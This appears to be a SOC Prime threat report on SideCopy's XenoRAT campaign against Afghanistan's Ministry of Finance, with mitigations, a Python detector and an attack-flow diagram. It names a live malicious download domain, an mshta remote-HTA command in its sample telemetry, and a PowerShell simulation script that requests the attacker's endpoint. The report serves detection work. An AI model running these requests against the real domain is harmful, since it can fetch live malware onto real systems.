SOC Prime Bias: Critical

02 Jun 2026 19:24 UTC

Operation XENOFISCAL: SideCopy Deploys Persistent XenoRAT Against Afghanistan’s Ministry of Finance

SOC Prime Team


Summary

The report outlines a spear-phishing operation in which a malicious LNK file triggers mshta.exe to download and execute a remote HTA payload. That payload creates registry-based persistence and eventually deploys XenoRAT 1.8.7, which communicates with command-and-control infrastructure hosted on bulletproof servers in Europe. The activity is attributed to the Pakistan-linked SideCopy group, believed to operate as a sub-cluster of APT36. The campaign specifically targets Afghanistan’s Ministry of Finance and its provincial finance offices.

Investigation

Seqrite Labs analyzed the complete intrusion chain, following execution from the initial LNK file through several loader DLLs, HTA and JavaScript stages, and a .NET shellcode loader that delivered the final XenoRAT payload. Their technical review uncovered abuse of living-off-the-land binaries, custom Base64 and GZIP decoding routines, in-memory reflection, and persistence achieved through Run keys and a scheduled task. Infrastructure analysis linked the operation to an Afghan education-themed domain and a hosting provider based in Bulgaria.

Mitigation

Organizations should block execution of LNK files from untrusted sources and closely monitor the use of mshta.exe. PowerShell and HTA execution should be controlled through strict allow-listing policies. Defenders should also detect suspicious Run key creation and scheduled tasks named XenoUpdateManager, while monitoring outbound connections to the known malicious domains and IP ranges tied to the campaign.
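Detection logic for the items above (mshta.exe launched with a remote URL, Run key writes, a scheduled task named XenoUpdateManager, and lookups of the report's download domain) run over constructed telemetry; this is an added example, not SOC Prime's or Seqrite's rule logic, and the event field names are assumptions.

```python
"""Toy detector for the host and network indicators listed under Mitigation.
Constructed example; not SOC Prime's or Seqrite's rule logic. The event
records are assumed to resemble Sysmon/Windows security telemetry."""
import re

MALICIOUS_DOMAINS = {"abimj.edu.af"}            # download/C2 domain named in the report
TASK_NAME = "xenoupdatemanager"                  # scheduled task name from the report
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\\", re.I)
URL_IN_CMD = re.compile(r"""https?://([^\s/'"]+)""", re.I)

def inspect(event):
    """Return a list of finding strings for one event dict (empty when benign)."""
    findings = []
    kind = event.get("type")
    if kind == "process":                        # Sysmon event 1 style record
        image = event.get("image", "").lower()
        cmd = event.get("cmdline", "")
        m = URL_IN_CMD.search(cmd)
        if image.endswith("\\mshta.exe") and m:
            findings.append(f"mshta.exe launching remote HTA: {m.group(0)}")
        if image.endswith("\\schtasks.exe") and TASK_NAME in cmd.lower():
            findings.append("scheduled task XenoUpdateManager created via schtasks")
        if m and m.group(1).lower() in MALICIOUS_DOMAINS:
            findings.append(f"process contacting known malicious domain {m.group(1)}")
    elif kind == "registry" and RUN_KEY.search(event.get("target", "")):   # Sysmon 13
        findings.append(f"Run key persistence written: {event['target']}")
    elif kind == "task" and event.get("name", "").lower() == TASK_NAME:     # Security 4698
        findings.append("scheduled task XenoUpdateManager registered")
    elif kind == "dns" and event.get("query", "").lower() in MALICIOUS_DOMAINS:  # Sysmon 22
        findings.append(f"DNS lookup of known malicious domain {event['query']}")
    return findings

def scan(events):
    """Run inspect() over a batch of events and flatten the findings."""
    return [f for e in events for f in inspect(e)]

# Constructed sample telemetry (not real captured logs)
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "https://abimj.edu.af/index.php"'},
    {"type": "registry",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "task", "name": "XenoUpdateManager"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"type": "dns", "query": "abimj.edu.af"},
]
```

`scan(SAMPLE_EVENTS)` yields five findings (the mshta event triggers both the proxy-execution and the domain check); the notepad event yields none.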

Response

Affected systems should be isolated immediately, the malicious Run key and scheduled task removed, and the XenoRAT process terminated. Investigators should collect memory and file-based artifacts for forensic analysis and then hunt across the environment for matching indicators. Any compromised credentials should be reset, and network segmentation should be enforced to reduce further command-and-control communication.

Attack Flow

    graph TB
    %% Class definitions
    classDef phase fill:#99ccff
    classDef tool fill:#ffcc99
    classDef malware fill:#ff9999
    classDef process fill:#ccffcc
    classDef technique fill:#dddddd
    %% Nodes
    phase_initial["<b>Phase</b> – Initial Access<br/><b>Technique</b> – T1566.001 Spearphishing Attachment<br/>Email with ZIP containing malicious LNK"]
    class phase_initial phase
    file_lnk["<b>File</b> – …pdf.lnk<br/>LNK Icon Smuggling T1027.012"]
    class file_lnk technique
    proc_mshta["<b>Process</b> – mshta.exe<br/>System Binary Proxy Execution T1218.005"]
    class proc_mshta process
    tool_htapayload["<b>Tool</b> – HTA Payload<br/>Fetched from https://abimj.edu.af/index.php"]
    class tool_htapayload tool
    phase_execution["<b>Phase</b> – Execution<br/><b>Technique</b> – T1059.007 JavaScript Interpreter"]
    class phase_execution phase
    tech_html_smuggling["<b>Technique</b> – T1027.006 HTML Smuggling"]
    class tech_html_smuggling technique
    tech_obfuscation["<b>Technique</b> – T1027 Obfuscated Files or Information"]
    class tech_obfuscation technique
    malware_loader["<b>Malware</b> – In-memory .NET Loader<br/>Reflective Code Loading T1620"]
    class malware_loader malware
    phase_persistence["<b>Phase</b> – Persistence"]
    class phase_persistence phase
    tech_registry_run["<b>Technique</b> – T1547.001 Registry Run Keys/Startup Folder"]
    class tech_registry_run technique
    tech_scheduled_task["<b>Technique</b> – T1053 Scheduled Task/Job"]
    class tech_scheduled_task technique
    tool_batch["<b>Tool</b> – Hidden Batch File"]
    class tool_batch tool
    phase_defense["<b>Phase</b> – Defense Evasion"]
    class phase_defense phase
    tech_process_injection["<b>Technique</b> – T1055 Process Injection"]
    class tech_process_injection technique
    tech_shared_modules["<b>Technique</b> – T1129 Shared Modules"]
    class tech_shared_modules technique
    phase_discovery["<b>Phase</b> – Discovery"]
    class phase_discovery phase
    tech_system_info["<b>Technique</b> – T1082 System Information Discovery"]
    class tech_system_info technique
    tech_av_discovery["<b>Technique</b> – T1518 Security Software Discovery"]
    class tech_av_discovery technique
    phase_collection["<b>Phase</b> – Collection"]
    class phase_collection phase
    tech_keylogging["<b>Technique</b> – T1056.001 Keylogging"]
    class tech_keylogging technique
    tech_screen_capture["<b>Technique</b> – T1113 Screen Capture"]
    class tech_screen_capture technique
    tech_audio_capture["<b>Technique</b> – T1123 Audio Capture"]
    class tech_audio_capture technique
    tech_video_capture["<b>Technique</b> – T1125 Video Capture"]
    class tech_video_capture technique
    phase_c2["<b>Phase</b> – Command and Control"]
    class phase_c2 phase
    tech_encrypted_channel["<b>Technique</b> – T1095 Encrypted Channel"]
    class tech_encrypted_channel technique
    tech_web_service["<b>Technique</b> – T1102 Web Service"]
    class tech_web_service technique
    tech_external_proxy["<b>Technique</b> – T1573 Proxy External Proxy"]
    class tech_external_proxy technique
    phase_cleanup["<b>Phase</b> – Cleanup"]
    class phase_cleanup phase
    tech_file_deletion["<b>Technique</b> – T1070.004 File Deletion"]
    class tech_file_deletion technique
    tech_clear_persistence["<b>Technique</b> – T1070.009 Clear Persistence"]
    class tech_clear_persistence technique
    malware_xenorat["<b>Malware</b> – XenoRAT<br/>Final payload providing remote access"]
    class malware_xenorat malware
    tech_appdomain_manager["<b>Technique</b> – T1574.014 Hijack Execution Flow AppDomainManager"]
    class tech_appdomain_manager technique
    %% Connections
    phase_initial -->|delivers| file_lnk
    file_lnk -->|executes via| proc_mshta
    proc_mshta -->|downloads| tool_htapayload
    tool_htapayload -->|runs| phase_execution
    phase_execution -->|uses| tech_html_smuggling
    phase_execution -->|uses| tech_obfuscation
    phase_execution -->|loads| malware_loader
    malware_loader -->|creates| phase_persistence
    phase_persistence -->|adds| tech_registry_run
    phase_persistence -->|adds| tech_scheduled_task
    tech_registry_run -->|implemented by| tool_batch
    tech_scheduled_task -->|implemented by| tool_batch
    phase_persistence -->|leads to| phase_defense
    phase_defense -->|employs| tech_process_injection
    phase_defense -->|uses| tech_shared_modules
    phase_defense -->|includes| tech_obfuscation
    phase_defense -->|leads to| phase_discovery
    phase_discovery -->|gathers| tech_system_info
    phase_discovery -->|enumerates| tech_av_discovery
    phase_discovery -->|leads to| phase_collection
    phase_collection -->|captures| tech_keylogging
    phase_collection -->|captures| tech_screen_capture
    phase_collection -->|captures| tech_audio_capture
    phase_collection -->|captures| tech_video_capture
    phase_collection -->|feeds into| phase_c2
    phase_c2 -->|uses| tech_encrypted_channel
    phase_c2 -->|uses| tech_web_service
    phase_c2 -->|uses| tech_external_proxy
    phase_c2 -->|controls| malware_xenorat
    malware_xenorat -->|uses| tech_appdomain_manager
    malware_xenorat -->|triggers| phase_cleanup
    phase_cleanup -->|executes| tech_file_deletion
    phase_cleanup -->|executes| tech_clear_persistence
    %% Apply classes
    class phase_initial,phase_execution,phase_persistence,phase_defense,phase_discovery,phase_collection,phase_c2,phase_cleanup phase
    class file_lnk,proc_mshta technique
    class tool_htapayload,tool_batch tool
    class malware_loader,malware_xenorat malware
    class tech_html_smuggling,tech_obfuscation,tech_registry_run,tech_scheduled_task,tech_process_injection,tech_shared_modules,tech_system_info,tech_av_discovery,tech_keylogging,tech_screen_capture,tech_audio_capture,tech_video_capture,tech_encrypted_channel,tech_web_service,tech_external_proxy,tech_file_deletion,tech_clear_persistence,tech_appdomain_manager technique

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Reconnaissance: The attacker knows that the Afghan education domain (abimj.edu.af) hosts malicious PHP scripts used as a download cradle.
    2. Execution: Using a compromised PowerShell session, the attacker issues an Invoke-WebRequest call to the exact malicious endpoint /index.php.
    3. Payload Retrieval: The PHP script returns a Base64‑encoded PowerShell payload that is immediately executed via IEX. (The payload execution itself is not required for the rule to fire; only the HTTP request matters.)
  • Regression Test Script:

    <# 
    Simulate malicious access to the Afghan education domain.
    This script reproduces the exact request that should trigger the detection rule.
    #>
    
    $url = "https://abimj.edu.af/index.php"
    try {
        Write-Host "[*] Sending request to $url"
        $response = Invoke-WebRequest -Uri $url -UseBasicParsing -Headers @{
            "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
        }
        Write-Host "[+] Received HTTP $($response.StatusCode) – detection should have fired."
    } catch {
        Write-Error "Request failed: $_"
    }
  • Cleanup Commands:

    # Clear the local DNS resolver cache so the test domain lookup does not linger (ipconfig does not touch proxy state)
    ipconfig /flushdns
    # Optionally, remove the script file if it was saved to disk; $MyInvocation.MyCommand.Path is empty when run interactively
    if ($MyInvocation.MyCommand.Path) { Remove-Item -Path $MyInvocation.MyCommand.Path -Force }